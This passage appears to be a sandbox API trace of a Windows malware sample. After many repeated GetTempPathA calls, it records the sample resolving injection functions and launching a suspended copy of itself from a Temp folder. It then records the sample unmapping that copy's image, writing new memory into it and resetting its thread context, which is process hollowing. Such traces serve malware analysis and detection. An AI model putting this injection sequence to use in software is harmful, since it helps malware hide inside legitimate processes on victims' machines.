nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.478] VirtualProtect (in: lpAddress=0x1834c8, dwSize=0x564a0, flNewProtect=0x40, lpflOldProtect=0x12fe48 | out: lpflOldProtect=0x12fe48*=0x4) returned 1 [0093.479] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0093.479] LoadLibraryA (lpLibFileName="user32") returned 0x76b40000 [0093.479] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxA") returned 0x76b9ea11 [0093.479] LoadLibraryA (lpLibFileName="kernel32") returned 0x76910000 [0093.479] GetProcAddress (hModule=0x76910000, lpProcName="WinExec") returned 0x7699e5fd [0093.479] GetProcAddress (hModule=0x76910000, lpProcName="CreateFileA") returned 0x7695cee8 [0093.479] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0093.479] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0093.480] GetProcAddress (hModule=0x76910000, lpProcName="CreateProcessA") returned 0x76912082 [0093.480] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadContext") returned 0x76970cc1 [0093.480] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAlloc") returned 0x76962fb6 [0093.480] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAllocEx") returned 0x7694c1b6 [0093.480] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0093.480] GetProcAddress (hModule=0x76910000, lpProcName="ReadProcessMemory") returned 0x7694c1ce [0093.480] GetProcAddress (hModule=0x76910000, lpProcName="WriteProcessMemory") returned 0x7694c1de [0093.480] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadContext") returned 0x769a0193 [0093.480] GetProcAddress (hModule=0x76910000, lpProcName="ResumeThread") returned 0x76950f1c [0093.480] GetProcAddress (hModule=0x76910000, lpProcName="WaitForSingleObject") returned 0x7695ba90 [0093.480] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameA") returned 0x769633f6 [0093.480] GetProcAddress (hModule=0x76910000, lpProcName="GetCommandLineA") returned 0x769698ff [0093.480] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77230000 [0093.480] GetProcAddress (hModule=0x77230000, lpProcName="NtUnmapViewOfSection") returned 0x772769b8 [0093.480] GetProcAddress (hModule=0x76b40000, lpProcName="RegisterClassExA") returned 0x76b46293 [0093.480] GetProcAddress (hModule=0x76b40000, lpProcName="CreateWindowExA") returned 0x76b4bf40 [0093.480] GetProcAddress (hModule=0x76b40000, lpProcName="PostMessageA") returned 0x76b4b446 [0093.480] GetProcAddress (hModule=0x76b40000, lpProcName="GetMessageA") returned 0x76b51899 [0093.480] GetProcAddress (hModule=0x76b40000, lpProcName="DefWindowProcA") returned 0x76b4bb1c [0093.480] RegisterClassExA (param_1=0x12fbc0) returned 0xc13d [0093.489] CreateWindowExA (dwExStyle=0x200, lpClassName="bxVV7cGHPHusOnmHbFKqGnzKMpomaw", lpWindowName="ptodEzQlWskupc762Nhc3wjD8apfHQ", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=1000, nHeight=1000, hWndParent=0x0, hMenu=0x0, hInstance=0x0, lpParam=0x0) returned 0x7013c [0093.544] PostMessageA (hWnd=0x7013c, Msg=0x400, wParam=0x64, lParam=0x1f4) returned 1 [0093.544] GetMessageA (in: lpMsg=0x12fbf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x12fbf0) returned 1 [0093.544] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x1000, flProtect=0x4) returned 0x150000 [0093.544] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x150000, nSize=0x2800 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\cnuu8vyt.exe")) returned 0x30 [0093.544] GetCommandLineA () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"PREPARING\" \"60000\"" [0093.544] CreateProcessA (in: lpApplicationName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe", lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"PREPARING\" \"60000\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12faf0*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb48 | out: lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"PREPARING\" \"60000\"", lpProcessInformation=0x12fb48*(hProcess=0x4c, hThread=0x48, dwProcessId=0xae4, dwThreadId=0xae8)) returned 1 [0093.546] VirtualFree (lpAddress=0x150000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.546] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x1000, flProtect=0x4) returned 0x150000 [0093.546] GetThreadContext (in: hThread=0x48, lpContext=0x150000 | out: lpContext=0x150000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffdf000, Edx=0x0, Ecx=0x0, Eax=0x402581, Ebp=0x0, Eip=0x77277098, SegCs=0x1b, EFlags=0x200, Esp=0x12fff0, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0093.597] ReadProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x7ffdf008, lpBuffer=0x12fb3c, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12fb3c*, lpNumberOfBytesRead=0x0) returned 1 [0093.598] NtUnmapViewOfSection (ProcessHandle=0x4c, BaseAddress=0x400000) returned 0x0 [0093.598] VirtualAllocEx (hProcess=0x4c, lpAddress=0x400000, dwSize=0x11d000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0093.598] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x400000, lpBuffer=0x184768*, nSize=0x1000, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x184768*, lpNumberOfBytesWritten=0x0) returned 1 [0093.598] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x401000, lpBuffer=0x184b68, nSize=0x0, lpNumberOfBytesWritten=0x0 | out: lpNumberOfBytesWritten=0x0) returned 0 [0093.598] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x4c7000, lpBuffer=0x184b68*, nSize=0x54600, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x184b68*, lpNumberOfBytesWritten=0x0) returned 1 [0093.605] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x51c000, lpBuffer=0x1d9168*, nSize=0x800, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x1d9168*, lpNumberOfBytesWritten=0x0) returned 1 [0093.605] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x7ffdf008, lpBuffer=0x18489c*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x18489c*, lpNumberOfBytesWritten=0x0) returned 1 [0093.605] SetThreadContext (hThread=0x48, lpContext=0x150000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffdf000, Edx=0x0, Ecx=0x0, Eax=0x51b2d0, Ebp=0x0, Eip=0x77277098, SegCs=0x1b, EFlags=0x200, Esp=0x12fff0, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, 